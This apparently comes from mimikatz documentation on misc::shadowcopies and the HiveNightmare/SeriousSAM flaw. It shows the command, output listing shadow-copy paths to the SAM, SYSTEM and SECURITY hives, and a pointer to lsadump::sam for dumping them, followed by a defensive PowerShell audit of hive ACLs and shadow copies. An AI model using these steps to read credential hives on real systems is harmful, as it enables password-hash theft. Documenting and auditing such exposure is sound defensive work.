shadowcopies

misc::shadowcopies is used to list the available shadow copies on the system.
The HiveNightmare / SeriousSAM vulnerability was discovered by JonasLyk. According to Will Dormann, Builtin\Users had RX access to the SAM file somewhere between Windows 10 1803 and 1809, which allows regular users to dump the SAM.
(Screenshots: SAM file ACLs on Win10 1809, Win10 1090 and Win 10.0.19043.1110 (21H1))
mimikatz # misc::shadowcopies
ShadowCopy Volume : HarddiskVolumeShadowCopy12
| Path : \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\
| Volume LastWrite: 13/10/2021 10:12:09
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SYSTEM
| LastWrite : 20/10/2021 15:07:53
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SAM
| LastWrite : 20/10/2021 15:07:53
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SECURITY
| LastWrite : 20/10/2021 15:07:53
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SOFTWARE
| LastWrite : 20/10/2021 15:09:00
...Output Omitted...
lsadump::sam can then be used by passing the shadow copy paths to /sam and /system.
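The defender-side counterpart of the two steps above, as an added example that is not part of mimikatz or of the original page: audit the ACLs of the live SAM, SYSTEM and SECURITY hives for read access granted to non-administrative principals, and enumerate the shadow copies that may still hold a copy of those hives (the same volumes misc::shadowcopies lists). The principal list and the Test-HiveExposure function name are assumptions of this example.

```powershell
# Added example (not mimikatz code). Reports hives readable by non-admin
# principals and lists shadow copies on the machine. Run from an elevated shell.
function Test-HiveExposure {
    [CmdletBinding()]
    param(
        # Hives whose ACLs are checked; these are the files mimikatz reads from a shadow copy.
        [string[]]$Hives = @('SAM', 'SYSTEM', 'SECURITY'),
        # Assumed list of principals that must never hold read access to the live hives.
        [string[]]$NonAdminPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
    )

    $configDir = Join-Path $env:windir 'System32\config'
    $readData  = [System.Security.AccessControl.FileSystemRights]::ReadData

    foreach ($name in $Hives) {
        $path = Join-Path $configDir $name
        # Reading the security descriptor works even though the hive itself is locked.
        $acl = Get-Acl -Path $path

        foreach ($ace in $acl.Access) {
            # Only Allow ACEs that include the ReadData bit matter; Synchronize-only
            # ACEs are ignored so Write-only entries do not produce false positives.
            $grantsRead = ($ace.FileSystemRights -band $readData) -ne 0
            if ($ace.AccessControlType -eq 'Allow' -and $grantsRead -and
                $NonAdminPrincipals -contains $ace.IdentityReference.Value) {

                [pscustomobject]@{
                    Hive      = $path
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited   # inherited ACEs point at the config directory ACL
                }
            }
        }
    }
}

# 1. Live hive ACLs: any output here means a regular user can read the hive.
$exposed = Test-HiveExposure
if ($exposed) {
    $exposed | Format-Table -AutoSize
} else {
    Write-Host 'No non-admin read access on SAM/SYSTEM/SECURITY.'
}

# 2. Shadow copies: a fixed ACL on the live files does not change the copies
#    already taken, so each listed copy still needs to be reviewed.
Get-CimInstance -ClassName Win32_ShadowCopy |
    Select-Object ID, InstallDate, DeviceObject, VolumeName |
    Format-Table -AutoSize
```

The DeviceObject column is the \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path shown in the mimikatz output above, so the two listings can be matched one to one. Because a shadow copy preserves the hives as they were when it was taken, remediation has to cover both the live directory ACL and the existing copies; re-running the function after the ACL change only confirms the first half.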